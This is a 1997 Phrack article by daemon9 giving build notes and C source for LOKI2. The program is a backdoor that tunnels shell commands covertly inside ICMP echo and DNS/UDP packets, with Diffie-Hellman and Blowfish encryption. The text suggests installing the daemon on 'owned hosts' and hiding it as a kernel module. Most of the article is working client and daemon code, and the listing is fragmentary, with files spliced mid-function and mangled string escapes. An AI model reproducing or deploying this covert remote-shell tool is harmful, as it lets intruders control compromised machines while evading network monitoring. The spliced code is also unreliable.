Subject: [Phrack] LOKI2 - information-tunneling program
---[ Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 06 of 17
-------------------------[ L O K I 2 (the implementation)
--------[ daemon9 <route@infonexus.com>
----[ Introduction
This is the companion code to go with the article on covert channels in
network protocols that originally appeared in P49-06. The article does not
explain the concepts, it only covers the implementation. Readers desiring more
information are directed to P49-06.
LOKI2 is an information-tunneling program. It is a proof of concept work
intending to draw attention to the insecurity that is present in many network
protocols. In this implementation, we tunnel simple shell commands inside of
ICMP_ECHO / ICMP_ECHOREPLY and DNS namelookup query / reply traffic. To the
network protocol analyzer, this traffic seems like ordinary benign packets of
the corresponding protocol. To the correct listener (the LOKI2 daemon)
however, the packets are recognized for what they really are. Some of the
features offered are: three different cryptography options and on-the-fly
protocol swapping (which is a beta feature and may not be available in your
area).
The vulnerabilities presented here are not new. They have been known
about and actively exploited for years. LOKI2 is simply one possible
implementation. Implementations of similar programs exist for UDP, TCP, IGMP,
etc... This is by no means limited to type 0 and type 8 ICMP packets.
Before you go ahead and patch owned hosts with lokid, keep in mind that
when linked against the crypto libraries, it is around 70k, with about 16k
alone in the data segment. It also forks off at least twice per client
request. This is not a clandestine program. You want clandestine?
Implement LOKI2 as an lkm, or, even better, write kernel diffs and make it
part of the O/S.
----------------------[ BUILDING AND INSTALLATION
Building LOKI2 should be painless. GNU autoconf was not really needed for
this project; consequently you may have to edit the Makefile a bit. This
shouldn't be a problem, becuase you are very smart.
----[ I. Edit the toplevel Makefile
1) Make sure your OS is supported. As of this distribution, we suppport the
following (if you port LOKI2 to another architecture, please send me the
diffs):
Linux 2.0.x
OpenBSD 2.1
FreeBSD 2.1.x
Solaris 2.5.x
2) Pick an encryption technology. STRONG_CRYPTO (DH and Blowfish),
WEAK_CRYPTO (XOR), or NO_CRYPTO (data is transmitted in plaintext).
3) If you choose STRONG_CRYPTO, uncomment LIB_CRYPTO_PATH, CLIB, and MD5_OBJ.
You will also need SSLeay (see below).
4) Chose whether or not to allocate a psudeo terminal (PTY) (may not be
implemented) or just use popen (POPEN) and use the
`pipe -> fork -> exec -> sh` sequence to execute commands.
5) See Net/3 restrictions below and adjust accordingly.
6) Pausing between sends is a good idea, especially when both hosts are on
the same Ethernet. We are dealing with a potentially lossy protocol and
there is no reliablity layer added as of this version... SEND_PAUSE
maintains some order and keeps the daemon from spewing packets too fast.
You can also opt to increase the pause to a consdiderably larger value,
making the channel harder to track on the part of the netework snooper.
(This would, of course, necessitate the client to choose an even larger
MIN_TIMEOUT value.
----[ II. Supplemental librarys
1) If you are using STRONG_CRYPTO you will need to get the SSLeay crypto
library, version 0.6.6. DO NOT get version 0.8.x as it is untested with
LOKI2. Hopefully these URLs will not expire anytime soon:
2) Build and install SSLeay. If you decide not to install it, Make sure you
correct the crypto library path LIB_CRYPTO_PATH in the Makefile and
include paths in loki.h.
----[ III. Compilation and linking
1) From the the toplevel directory, `make systemtype`.
2) This will build and strip the executables.
----[ IV. Testing
1) Start the daemon in verbose mode using ICMP_ECHO (the default) `./lokid`
2) Start up a client `./loki -d localhost`
3) Issue an `ls`.
4) You should see a short listing of the root directory.
5) Yay.
6) For real world testing, install the daemon on a remote machine and go to
town. See below for potential problems.
----[ V. Other Options
The loki.h header file offers a series of configurable options.
MIN_TIMEOUT is the minimum amount of time in whole seconds the client will
wait for a response from the server before the alarm timer goes off.
MAX_RETRAN (STRONG_CRYPTO only) is the maximum amount of time in whole
seconds the client will retransmit its initial public key
handshaking packets before giving up. This feature will be
deprecated when a reliability layer is added.
MAX_CLIENT is the maximum amount of clients the server will accept and
service concurrently.
KEY_TIMER is the maximum amount of time in whole seconds an idle client
entry will be allowed to live in the servers database. If this
amount of time has elapsed, all entries in the servers client
database that have been inactive for KEY_TIMER seconds will be
removed. This provides the server with a simple way to clean up
resources from crashed or idle clients.
----------------------[ LOKI2 CAVEATS AND KNOWN BUGS
Net/3 Restrictions
Under Net/3, processes interested in receiving ICMP messages must register
with the kernel in order to get these messages. The kernel will then pass
all ICMP messages to these registered listeners, EXCEPT for damaged ICMP
packets and request packets. Net/3 TCP/IP implementations will not pass ICMP
request messages of any kind to any registered listeners. This is a problem
if we are going to be using ICMP_ECHO (a request type packet) and want it to
be directly passed to our user-level program (lokid). We can get around this
restriction by inverting the flow of the transactions. We send ICMP_ECHOREPLYs
and elicit ICMP_ECHOs.
Note, that under Linux, we do not have this probem as ALL valid ICMP
packets are delivered to user-level processes. If the daemon is installed on
a Linux box, we can use the normal ICMP_ECHO -> ICMP_ECHOREPLY method of
tunneling. Compile with -DNET3 according to this chart:
| Client |
-----------------------------------------------------
Daemon | ------- | Linux | *bsd* | Solaris |
-----------------------------------------------------
| Linux | no | yes | yes |
| *bsd* | no | yes | yes |
| Solaris | no | opt | opt |
The Initialization Vector
When using Strong Crypto, the initialization vector (ivec) incrementation
is event based. Every time a packet is sent by the client the client ivec is
incremented, and, every time a packet is received by the server, the server
side ivec is also incremented. This is fine if both ends stay in sync with
each other. However, we are dealing with a potentially lossy protocol. If
a packet from the client to the server is dropped, the ivecs become desynched,
and the client can no longer communicate with the server.
There are two easy ways to deal with this. One would be to modify the ivec
permutation routine to be time-vector based, having the ivecs increase as time
goes by. This is problematic for several reasons. Initial synchronization
would be difficult, especially on different machine architectures with
different clock interrupt rates. Also, we would also have to pick a
relatively small time interval for ivec permutations to be effective on fast
networks, and the smaller the ivec time differential is, the more the protocol
would suffer from clock drift (which is actually quite considerable).
Protocol Swaping
Swapping protocols is broken in everything but Linux. I think it has
something to do with the Net/3 socket semantics. This is probably just a bug
I need to iron out. Quite possibly something I did wrong. *shrug*...
Nevermind the fact that the server isn't doing any synchronous I/O multiplexing,
consequently, swapping protocols requires a socket change on everone's part.
This is why this feature is 'beta'.
Authentication
Um, well, there is none. Any client can connect to the server, and any
client can also cause the server to shut down. This is actually not a bug or
a caveat. It is intentional.
I/O
Should be done via select.
----------------------[ TODO LIST
- possible time vector-based ivec permutation instead of event-based as event
based is prone to synch failures, OR, even better, a reliability layer.
----[ The technologies
----------------------[ SYMMETRIC BLOCK CIPHER
A symmetric cipher is one that uses the same key for encryption and
decryption, or the decryption key is easily derivable from the encryption key.
Symmetric ciphers tend to be fast and well suited for bulk encryption, but
suffer from woeful key distribution problems. A block cipher is simply one
that encrypts data in blocks (usually 64-bits). The symmetric block cipher
employed by LOKI2 is Blowfish in CFB mode with a 128-bit key.
----------------------[ CFB MODE
Symmetric block ciphers can be implemented as self-synchronizing stream
ciphers. This is especially useful for data that is not suitable for padding
or when data needs to processed in byte-sized chunks. In CFB mode, data is
encrypted in units smaller then the block size. In our case, each encryption
of the 64-bit block cipher encrypts 8-bits of plaintext. The initialization
vector, which is used to seed the process, must be unique but not secret. We
use every 3rd byte of the symmetric key for our IV. The IV must change for
each message, to do this, we simply increment it as packets are generated.
----------------------[ BLOWFISH
Blowfish is a variable key length symmetric cipher designed by Bruce
Schneier. It is a portable, free, fast, strong algorithm.
It offers a key length of up to 448-bits, however, for LOKI2 we use
a 128-bit key.
----------------------[ ASYMMETRIC CIPHER
An asymmetric cipher makes use of two keys, coventionally called the
private key and public key. These two keys are mathematically related such
that messages encrypted with one, can only be decrypted by the other. It
is also infeasible to derive one key from the other. Asymmetric ciphers solve
the problem of key management by negating the need for a shared secret, however
they are much slower the symmetric ciphers. The perfect world in this case
is a hybrid system, using both a symmetric cipher for key exchange and a
symmetric cipher for encryption. This is the scheme employed in LOKI2.
---------------------[ DIFFIE - HELLMAN
In 1976, Whitfield Diffie and Marty Hellman came forth with the first
asymmetric cipher (DH). DH cannot be used for encryption, only for symmetric
key exchange. The strength of DH relies on the apparent difficulty in
computing discrete logarithms in a finite field. DH generates a shared secret
based off of 4 components:
P the public prime
g the public generator
c{x, X} the client's private/public keypair
s{y, Y} the server's private/public keypair
SS the shared secret (from the which the key is extracted)
The protocol for secret generation is simple:
Client Server
------ ------
1) X = g ^ x mod P
2) X -->
3) Y = g ^ y mod P
4) <-- Y
5) SS = Y ^ x mod P SS = X ^ y mod P
----------------------[ NETWORK FLOW
L O K I 2
Covert channel implementation for Unix
----------------------------------------------------------------------
daemon9|route [guild 1997]
----------------
| LOKI2 CLIENT |
---------------- -----------------------------------
^ | sendto() | FIRST GENERATION LOKI2 DAEMON |
| | -----------------------------------
| | client sends | shadow() server forks
| | data v
| v |
| | -----
| | |
| | |
| | v fork()
| | -----
| | C| |P
| v | |
| | | ----> clean_exit() parent exits
| | |
| | | 2nd generation child daemon becomes leader of a new
| | | session, handles initial network requests
^ | |
| | v
| | ------------------------------
| -----------> | SECOND GENERATION DAEMON | read() blocks until
| LOKI2 ------------------------------ data arrives
| network | ^
| traffic | |
| | |
-------<---- | |
| | |
| | |
| | |
| v fork() |
| ----- |
^ C| |P |
| | | | parent continues
| | --->------
| |
| | 3rd generation daemon handles client request
| v
| -----------------------------
--<---| THIRD GENERATION DAEMON |
-----------------------------
switch(PACKET_TYPE)
snocrash for being sno,
nirva for advice and help and the use of his FreeBSD machine,
mycroft for advice and the use of his Solaris machine,
alhambra for being complacent,
Craig Nottingham for letting me borrow some nomenclature,
truss and strace for being indespensible tools of the trade,
Extra Special Thanks to OPii <opii@dhp.com> for pioneering this concept and
technique.
----------------------[ THE SOURCE
Whelp, here it is. Extract the code from the article using one of the
included extraction utilities.
<++> L2/Makefile
# Makefile for LOKI2 Sun Jul 27 21:29:28 PDT 1997
# route (c) 1997 Guild Corporation, Worldwide
i_hear_a_voice_from_the_back_of_the_room:
@echo
@echo "LOKI2 Makefile"
@echo "Edit the Makefile and then invoke with one of the following:"
@echo
@echo "linux openbsd freebsd solaris clean"
@echo
@echo "See Phrack Magazine issue 51 article 7 for verbose instructions"
@echo
linux:
@make OS=-DLINUX CRYPTO_TYPE=-D$(CRYPTO_TYPE)
SPAWN_TYPE=-D$(SPAWN_TYPE) SEND_PAUSE=-D$(SEND_PAUSE)
FAST_CHECK=-Dx86_FAST_CHECK IP_LEN= all
openbsd:
@make OS=-DBSD4 CRYPTO_TYPE=-D$(CRYPTO_TYPE)
SPAWN_TYPE=-D$(SPAWN_TYPE) SEND_PAUSE=-D$(SEND_PAUSE)
FAST_CHECK=-Dx86_FAST_CHECK IP_LEN= all
freebsd:
@make OS=-DBSD4 CRYPTO_TYPE=-D$(CRYPTO_TYPE)
SPAWN_TYPE=-D$(SPAWN_TYPE) SEND_PAUSE=-D$(SEND_PAUSE)
FAST_CHECK=-Dx86_FAST_CHECK IP_LEN=-DBROKEN_IP_LEN all
solaris:
@make OS=-DSOLARIS CRYPTO_TYPE=-D$(CRYPTO_TYPE)
SPAWN_TYPE=-D$(SPAWN_TYPE) SEND_PAUSE=-D$(SEND_PAUSE)
LIBS+=-lsocket LIBS+=-lnsl IP_LEN= all
extern struct loki rdg;
extern int verbose;
extern int destroy_shm;
extern struct client_list *client;
extern u_short c_id;
#ifdef STRONG_CRYPTO
extern short ivec_salt;
extern u_char user_key[BF_KEYSIZE];
#endif
#ifdef PTY
extern int mfd;
#endif
/*
* The server maintains an array of active client information. This
* function simply steps through the structure array and attempts to add
* an entry.
*/
int add_client(u_char *key)
{
int i = 0, emptyslot = -1;
#ifdef PTY
char p_name[BUFSIZE] = {0};
#endif
locks();
for (; i < MAX_CLIENT; i++)
{
if (IS_GOOD_CLIENT(rdg))
{ /* Check for duplicate entries
* (which are to be expected when
* not using STRONG_CRYPTO)
*/
#ifdef STRONG_CRYPTO
if (verbose) fprintf(stderr, S_MSG_DUP);
#endif
emptyslot = i;
break;
} /* tag the first empty slot found */
if ((!(client[i].client_id))) emptyslot = i;
}
if (emptyslot == -1)
{ /* No empty array slots */
if (verbose) fprintf(stderr, "nlokid: Client database full");
ulocks();
return (NNOK);
}
/* Initialize array with client info */
client[emptyslot].touchtime = time((time_t *)NULL);
if (emptyslot != i){
client[emptyslot].client_id = c_id;
client[emptyslot].client_ip = rdg.iph.ip_src;
client[emptyslot].packets_sent = 0;
client[emptyslot].bytes_sent = 0;
client[emptyslot].hits = 0;
#ifdef PTY
client[emptyslot].pty_fd = 0;
#endif
}
#ifdef STRONG_CRYPTO
/* copy unset bf key and set salt */
bcopy(key, client[emptyslot].key, BF_KEYSIZE);
client[emptyslot].ivec_salt = 0;
#endif
ulocks();
return (emptyslot);
}
/*
* Look for a client entry in the client database. Either copy the clients
* key into user_key and update timestamp, or clear the array entry,
* depending on the disposition of the call.
*/
int locate_client(int disposition)
{
int i = 0;
locks();
for (; i < MAX_CLIENT; i++)
{
if (IS_GOOD_CLIENT(rdg))
{
if (disposition == FIND) /* update timestamp */
{
client[i].touchtime = time((time_t *)NULL);
#ifdef STRONG_CRYPTO
/* Grab the key */
bcopy(client[i].key, user_key, BF_KEYSIZE);
#endif
}
/* Remove entry */
else if (disposition == DESTROY)
bzero(&client[i], sizeof(client[i]));
ulocks();
return (i);
}
}
ulocks(); /* Didn't find the client */
return (NNOK);
}
/*
* Fill a string with current stats about a particular client.
*/
int stat_client(int entry, u_char *buf, int prot, time_t uptime)
{
int n = 0;
time_t now = 0;
struct protoent *proto = 0;
/* locate_client didn't find an
* entry
*/
if (entry == NNOK)
{
fprintf(stderr, "DEBUG: stat_client nonon");
return (NOK);
}
n = sprintf(buf, "nlokid version:tt%sn", VERSION);
n += sprintf(&buf[n], "remote interface:t%sn", host_lookup(rdg.iph.ip_dst));
proto = getprotobynumber(prot);
n += sprintf(&buf[n], "active transport:t%sn", proto -> p_name);
n += sprintf(&buf[n], "active cryptography:t%sn", CRYPTO_TYPE);
time(&now);
n += sprintf(&buf[n], "server uptime:tt%.02f minutesn", difftime(now, uptime) / 0x3c);
locks();
n += sprintf(&buf[n], "client ID:tt%dn", client[entry].client_id);
n += sprintf(&buf[n], "packets written:t%ldn", client[entry].packets_sent);
n += sprintf(&buf[n], "bytes written:tt%ldn", client[entry].bytes_sent);
n += sprintf(&buf[n], "requests:tt%dn", client[entry].hits);
ulocks();
return (n);
}
/*
* Unsets alarm timer, then calls age_client, then resets signal handler
* and alarm timer.
*/
void client_expiry_check(){
alarm(0);
age_client();
/* re-establish signal handler */
if (signal(SIGALRM, client_expiry_check) == SIG_ERR)
err_exit(1, 1, verbose, "[fatal] cannot catch SIGALRM");
alarm(KEY_TIMER);
}
/*
* This function is called every KEY_TIMER interval to sweep through the
* client list. It zeros any entrys it finds that have not been accessed
* in KEY_TIMER seconds. This gives us a way to free up entries from clients
* which may have crashed or lost their QUIT_C packet in transit.
*/
void age_client()
{
time_t timestamp = 0;
int i = 0;
time(×tamp);
locks();
for (; i < MAX_CLIENT; i++)
{
if (client[i].client_id)
{
if (difftime(timestamp, client[i].touchtime) > KEY_TIMER)
{
if (verbose) fprintf(stderr, "nlokid: inactive client <%d> expired from list [%d]n", client[i].client_id, i);
bzero(&client[i], sizeof(client[i]));
#ifdef STRONG_CRYPTO
ivec_salt = 0;
#endif
}
}
}
ulocks();
}
/*
* Client info list.
* MAX_CLIENT of these will be kept in a server-side array
*/
struct client_list
{
#ifdef STRONG_CRYPTO
u_char key[BF_KEYSIZE]; /* unset bf key */
u_short ivec_salt; /* the IV salter */
#endif
u_short client_id; /* client loki_id */
u_long client_ip; /* client IP address */
time_t touchtime; /* last time entry was hit */
u_long packets_sent; /* Packets sent to this client */
u_long bytes_sent; /* Bytes sent to this client */
u_int hits; /* Number of queries from client */
#ifdef PTY
int pty_fd; /* Master PTY file descriptor */
#endif
};
void update_client(int, int, u_long); /* Update a client entry */
/* client info into supplied buffer */
int stat_client(int, u_char *, int, time_t);
int add_client(u_char *); /* add a client entry */
int locate_client(int); /* find a client entry */
void age_client(void); /* age a client from the list */
u_short update_client_salt(int); /* update and return salt */
u_long check_client_ip(int, u_short *); /* return ip and id of target */
<--> client_db.h
<++> L2/crypt.c
/*
* LOKI2
*
* [ crypt.c ]
*
* 1996/7 Guild Corporation Worldwide [daemon9]
*/
/*
* Blowfish in cipher-feedback mode. This implements blowfish (a symmetric
* cipher) as a self-synchronizing stream cipher. The initialization
* vector (the initial dummy cipher-text block used to seed the encryption)
* need not be secret, but it must be unique for each encryption. I fill
* the ivec[] array with every 3rd key byte incremented linear-like via
* a global encryption counter (which must be synced in both client and
* server).
*/
void blur(int m, int bs, u_char *t)
{
int i = 0, j = 0, num = 0;
u_char ivec[IVEC_SIZE + 1] = {0};
for (; i < BF_KEYSIZE; i += 3) /* fill in IV */
ivec[j++] = (user_key[i] + (u_char)ivec_salt);
BF_cfb64_encrypt(t, t, (long)(BUFSIZE - 1), &bf_key, ivec, &num, m);
}
/*
* Generate DH keypair.
*/
DH* generate_dh_keypair()
{
DH *dh = NULL;
/* Initialize the DH structure */
dh = DH_new();
/* Convert the prime into BIGNUM */
(BIGNUM *)(dh -> p) = BN_bin2bn(modulus, sizeof(modulus), NULL);
/* Create a new BIGNUM */
(BIGNUM *)(dh -> g) = BN_new();
/* Set the DH generator */
BN_set_word((BIGNUM *)(dh -> g), DH_GENERATOR_5);
/* Generate the key pair */
if (!DH_generate_key(dh)) return ((DH *)NULL);
return(dh);
}
/*
* Extract blowfish key from the DH shared secret. A simple MD5 hash is
* perfect as it will return the 16-bytes we want, and obscure any possible
* redundancies or key-bit leaks in the DH shared secret.
*/
u_char *extract_bf_key(u_char *dh_shared_secret, int set_bf)
{
u_char digest[MD5_HASHSIZE];
unsigned len = BN2BIN_SIZE;
MD5_CTX context;
/* initialize MD5 (loads magic context
* constants)
*/
MD5Init(&context);
/* MD5 hashing */
MD5Update(&context, dh_shared_secret, len);
/* clean up of MD5 */
MD5Final(digest, &context);
bcopy(digest, user_key, BF_KEYSIZE);
/* In the server we dunot set the key
* right away; they are set when they
* are nabbed from the client list.
*/
if (set_bf == OK)
{
BF_set_key(&bf_key, BF_KEYSIZE, user_key);
return ((u_char *)NULL);
}
else return (strdup(user_key));
}
#endif
#ifdef WEAK_CRYPTO
/*
* Simple XOR obfuscation.
*
* ( Syko was right -- the following didn't work under certain compilation
* environments... Never write code in which the order of evaluation defines
* the result. See K&R page 53, at the bottom... )
*
* if (!m) while (i < bs) t[i] ^= t[i++ +1];
* else
* {
* i = bs;
* while (i) t[i - 1] ^= t[i--];
* }
*
*/
void blur(int m, int bs, u_char *t)
{
int i = 0;
if (!m)
{ /* Encrypt */
while (i < bs)
{
t[i] ^= t[i + 1];
i++;
}
}
else
{ /* Decrypt */
i = bs;
while (i)
{
t[i - 1] ^= t[i];
i--;
}
}
}
default:
err_exit(0, 0, 1, C_MSG_USAGE);
}
}
/* we need a destination address */
if (!sin.sin_addr.s_addr) err_exit(0, 0, verbose, C_MSG_USAGE);
if ((tsock = socket(AF_INET, SOCK_RAW, prot)) < 0)
err_exit(1, 1, 1, L_MSG_SOCKET);
#ifdef STRONG_CRYPTO /* ICMP only with strong crypto */
if (prot != IPPROTO_ICMP) err_exit(0, 0, verbose, L_MSG_ICMPONLY);
#endif
/* Raw socket to build packets */
if ((ripsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
err_exit(1, 1, verbose, L_MSG_SOCKET);
#ifdef DEBUG
fprintf(stderr, "nRaw IP socket: ");
fd_status(ripsock, OK);
#endif
#ifdef IP_HDRINCL
if (setsockopt(ripsock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0)
if (verbose) perror("Cannot set IP_HDRINCL socket option");
#endif
/* register packet dumping function
* to be called upon exit
*/
if (atexit(packets_read) == -1) err_exit(1, 1, verbose, L_MSG_ATEXIT);
fprintf(stderr, L_MSG_BANNER);
for (; ;)
{
#ifdef STRONG_CRYPTO
/* Key negotiation phase. Before we
* can do anything, we need to share
* a secret with the server. This
* is our key management phase.
* After this is done, we are
* established. We try MAX_RETRAN
* times to contact a server.
*/
if (!established)
{
/* Generate the DH parameters and public
* and private keypair
*/
if (!dh_keypair)
{
if (verbose) fprintf(stderr, "nloki: %s", L_MSG_DHKEYGEN);
if (!(dh_keypair = generate_dh_keypair()))
err_exit(1, 0, verbose, L_MSG_DHKGFAIL);
}
if (verbose) fprintf(stderr, "nloki: submiting our public key to server");
/* convert the BIGNUM public key
* into a big endian byte string
*/
bzero((u_char *)buf, BUFSIZE);
BN_bn2bin((BIGNUM *)dh_keypair -> pub_key, buf);
/* Submit our key and request to
* the server (in one packet)
*/
if (verbose) fprintf(stderr, C_MSG_PKREQ);
loki_xmit(buf, loki_id, prot, sin, L_PK_REQ);
}
else
{
#endif
bzero((u_char *)buf, BUFSIZE);
fprintf(stderr, PROMPT); /* prompt user for input */
read(STDIN_FILENO, buf, BUFSIZE - 1);
buf[strlen(buf)] = 0;
/* Nothing to parse */
if (buf[0] == 'n') continue; /* Escaped command */
if (buf[0] == '/') if ((!c_parse(buf, &timer))) continue;
/* Send request to server */
loki_xmit(buf, loki_id, prot, sin, L_REQ);
#ifdef STRONG_CRYPTO
}
#endif
/* change transports */
if (cflags & NEWTRANS)
{
close(tsock);
prot = (prot == IPPROTO_UDP) ? IPPROTO_ICMP : IPPROTO_UDP;
if ((tsock = socket(AF_INET, SOCK_RAW, prot)) < 0)
err_exit(1, 1, verbose, L_MSG_SOCKET);
pprot = getprotobynumber(prot);
if (verbose) fprintf(stderr, "nloki: Transport protocol changed to %s.n", pprot -> p_name);
cflags &= ~NEWTRANS;
continue;
}
if (cflags & TERMINATE) /* client should exit */
{
fprintf(stderr, "nloki: clean exitnroute [guild worldwide]n");
clean_exit(0);
}
/* Clear TRAP and VALID PACKET flags */
cflags &= (~TRAP & ~VALIDP);
/* set alarm singal handler */
if (signal(SIGALRM, catch_timeout) == SIG_ERR)
err_exit(1, 1, verbose, L_MSG_SIGALRM);
/* returns true if we land here as the
* result of a longjmp() -- IOW the
* alarm timer went off
*/
if (setjmp(env))
{
fprintf(stderr, "nAlarm.n%s", C_MSG_TIMEOUT);
cflags |= TRAP;
#ifdef STRONG_CRYPTO
if (!established) /* No connection established yet */
if (++retran == MAX_RETRAN) err_exit(1, 0, verbose, "[fatal] cannot contact server. Giving up.n");
else if (verbose) fprintf(stderr, "Resending...n");
#endif
}
while (!(cflags & TRAP))
{ /* TRAP will not be set unless the
* alarm timer expires or we get
* an EOT packet
*/
alarm(timer); /* block until alarm or read */
fprintf(stderr,"
%stt- you are here
%s xxtt- change alarm timeout to xx seconds (minimum of %d)
%stt- query loki server for client statistics
%stt- query loki server for all client statistics
%stt- swap the transport protocol ( UDP <-> ICMP ) [in beta]
%stt- quit the client
%stt- quit this client and kill all other clients (and the server)
%s desttt- proxy to another server [ UNIMPLIMENTED ]
%s destt- redirect to another client [ UNIMPLIMENTED ]n",
cflags &= ~VALIDC;
/* help */
if (!strncmp(buf, HELP, sizeof(HELP) - 1) || buf[1] == '?')
{
help();
return (NOK);
}
/* change alarm timer */
else if (!strncmp(buf, TIMER, sizeof(TIMER) - 1))
{
cflags |= VALIDC;
(*timer) = atoi(&buf[sizeof(TIMER) - 1]) > MIN_TIMEOUT ? atoi(&buf[sizeof(TIMER) - 1]) : MIN_TIMEOUT;
fprintf(stderr, "nloki: Alarm timer changed to %d seconds.", *timer);
return (NOK);
}
/* Quit client, send notice to server */
else if (!strncmp(buf, QUIT_C, sizeof(QUIT_C) - 1))
cflags |= (TERMINATE | VALIDC);
/* Quit client, send kill to server */
else if (!strncmp(buf, QUIT_ALL, sizeof(QUIT_ALL) - 1))
cflags |= (TERMINATE | VALIDC);
/* Request server-side statistics */
else if (!strncmp(buf, STAT_C, sizeof(STAT_C) - 1))
cflags |= VALIDC;
/* Swap transport protocols */
else if (!strncmp(buf, SWAP_T, sizeof(SWAP_T) - 1))
{
/* When using strong crypto we do not
* want to swap protocols.
*/
#ifdef STRONG_CRYPTO
fprintf(stderr, C_MSG_NOSWAP);
return (NOK);
#elif !(__linux__)
fprintf(stderr, "nloki: protocol swapping only supported in Linuxn");
return (NOK);
#else
cflags |= (NEWTRANS | VALIDC);
#endif
}
/* Request server to redirect output
* to another LOKI client
*/
else if (!strncmp(buf, REDIR_C, sizeof(REDIR_C) - 1))
cflags |= (REDIRECT | VALIDC);
/* Request server to simply proxy
* requests to another LOKI server
*/
else if (!strncmp(buf, PROXY_D, sizeof(PROXY_D) - 1))
cflags |= (PROXY | VALIDC);
/* Bad command trap */
if (!(cflags & VALIDC))
{
fprintf(stderr, "Unrecognized command %sn",buf);
return (NOK);
}
#define VERSION "2.0"
#define BUFSIZE 0x38 /* We build packets with a fixed payload.
* Fine for ICMP_ECHO/ECHOREPLY packets as they
* often default to a 56 byte payload. However
* DNS query/reply packets have no set size and
* are generally oddly sized with no padding.
*/
#define L_TAG 0xf001 /* Tags packets as LOKI */
#define L_PK_REQ 0xa1 /* Public Key request packet */
#define L_PK_REPLY 0xa2 /* Public Key reply packet */
#define L_EOK 0xa3 /* Encrypted ok */
#define L_REQ 0xb1 /* Standard reuqest packet */
#define L_REPLY 0xb2 /* Standard reply packet */
#define L_ERR 0xc1 /* Error of some kind */
#define L_ACK 0xd1 /* Acknowledgement */
#define L_QUIT 0xd2 /* Receiver should exit */
#define L_EOT 0xf1 /* End Of Transmission packet */
/* Packet type printing macro */
#ifdef DEBUG
#define PACKET_TYPE(ldg)
if (ldg.payload[0] == 0xa1) fprintf(stderr, "Public Key Request");
else if (ldg.payload[0] == 0xa2) fprintf(stderr, "Public Key Reply");
else if (ldg.payload[0] == 0xa3) fprintf(stderr, "Encrypted OK");
else if (ldg.payload[0] == 0xb1) fprintf(stderr, "Client Request");
else if (ldg.payload[0] == 0xb2) fprintf(stderr, "Server Reply");
else if (ldg.payload[0] == 0xc1) fprintf(stderr, "Error");
else if (ldg.payload[0] == 0xd1) fprintf(stderr, "ACK");
else if (ldg.payload[0] == 0xd2) fprintf(stderr, "QUIT");
else if (ldg.payload[0] == 0xf1) fprintf(stderr, "Server EOT");
else fprintf(stderr, "Unknown");
if (prot == IPPROTO_ICMP) fprintf(stderr, ", ICMP type: %dn", ldg.ttype.icmph.icmp_type);
else fprintf(stderr, "n");
#define DUMP_PACKET(ldg, i)
for (i = 0; i < BUFSIZE; i++) fprintf(stderr, "0x%x ",ldg.payload[i]);
fprintf(stderr, "n");
#endif
/*
* Escaped commands (not interpreted by the shell)
*/
#define HELP "/help" /* Help me */
#define TIMER "/timer" /* Change the client side timer */
#define QUIT_C "/quit" /* Quit the client */
#define QUIT_ALL "/quit all" /* Kill all clients and server */
#define STAT_C "/stat" /* Stat the client */
#define STAT_ALL "/stat all" /* Stat all the clients */
#define SWAP_T "/swapt" /* Swap protocols */
#define REDIR_C "/redirect" /* Redirect to another client */
#define PROXY_D "/proxy" /* Proxy to another server */
#ifdef IP_HDRINCL
if (setsockopt(ripsock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0)
if (verbose) perror("Cannot set IP_HDRINCL socket option");
#endif
/* power up shared memory segment and
* semaphore, register dump_shm to be
* called upon exit
*/
prep_shm();
if (atexit(dump_shm) == -1) err_exit(1, 1, verbose, L_MSG_ATEXIT);
fprintf(stderr, L_MSG_BANNER);
time(&uptime); /* server uptime timer */
#ifdef STRONG_CRYPTO
/* Generate DH parameters */
if (verbose) fprintf(stderr, "nlokid: %s", L_MSG_DHKEYGEN);
if (!(dh_keypair = generate_dh_keypair()))
err_exit(1, 0, verbose, L_MSG_DHKGFAIL);
if (verbose) fprintf(stderr, "nlokid: done.n");
#endif
#ifndef DEBUG
shadow(); /* go daemon */
#endif
destroy_shm = OK; /* if this process exits at any point
* from hereafter, mark shm as destroyed
*/
/* Every KEY_TIMER seconds, we should
* check the client_key list and see
* if any entries have been idle long
* enough to expire them.
*/
if (signal(SIGALRM, client_expiry_check) == SIG_ERR)
err_exit(1, 1, verbose, L_MSG_SIGALRM);
alarm(KEY_TIMER);
if (signal(SIGCHLD, reaper) == SIG_ERR)
err_exit(1, 1, verbose, L_MSG_SIGCHLD);
for (; ;)
{
cflags &= ~VALIDP; /* Blocking read */
c = read(tsock, (struct loki *)&rdg, LOKIP_SIZE);
switch (prot)
{ /* Is this a valid Loki packet? */
case IPPROTO_ICMP:
if ((IS_GOOD_ITYPE_D(rdg)))
{
cflags |= VALIDP;
c_id = rdg.ttype.icmph.icmp_id;
}
break;
case IPPROTO_UDP:
if ((IS_GOOD_UTYPE_D(rdg)))
{
cflags |= VALIDP;
c_id = rdg.ttype.udph.uh_sport;
}
break;
default:
err_exit(1, 0, verbose, L_MSG_WIERDERR);
}
if (cflags & VALIDP)
{
#ifdef DEBUG
fprintf(stderr, "n[DEBUG]ttlokid: packet read %d bytes, type: ", c);
PACKET_TYPE(rdg);
DUMP_PACKET(rdg, c);
#endif
switch (pid = fork())
{
case 0:
destroy_shm = NOK; /* child should NOT mark segment as
* destroyed when exiting...
*/
/* TLI seems to have problems in
* passing socket file desciptors around
*/
#ifdef SOLARIS
close(ripsock);
if ((ripsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
err_exit(1, 1, 1, L_MSG_SOCKET);
#ifdef DEBUG
fprintf(stderr, "nRaw IP socket: ");
fd_status(ripsock, OK);
#endif /* DEBUG */
#endif /* SOLARIS */
break;
default: /* parent will loop forever spawning
* children if we do not zero rdg
*/
bzero((struct loki *)&rdg, LOKIP_SIZE);
cflags &= ~VALIDP;
continue;
case -1: /* fork error */
err_exit(1, 1, verbose, "[fatal] forking error");
}
#ifdef STRONG_CRYPTO
/* preliminary evaluation of the pkt
* to see if we have a request for the
* servers public key
*/
if (rdg.payload[0] == L_PK_REQ)
{
if (verbose)
{
fprintf(stderr, "nlokid: public key submission and request : %s <%d> ", host_lookup(rdg.iph.ip_dst), c_id);
fprintf(stderr, "nlokid: computing shared secret");
}
DH_compute_key(buf1, (void *)BN_bin2bn(&rdg.payload[1], BN2BIN_SIZE, NULL), dh_keypair);
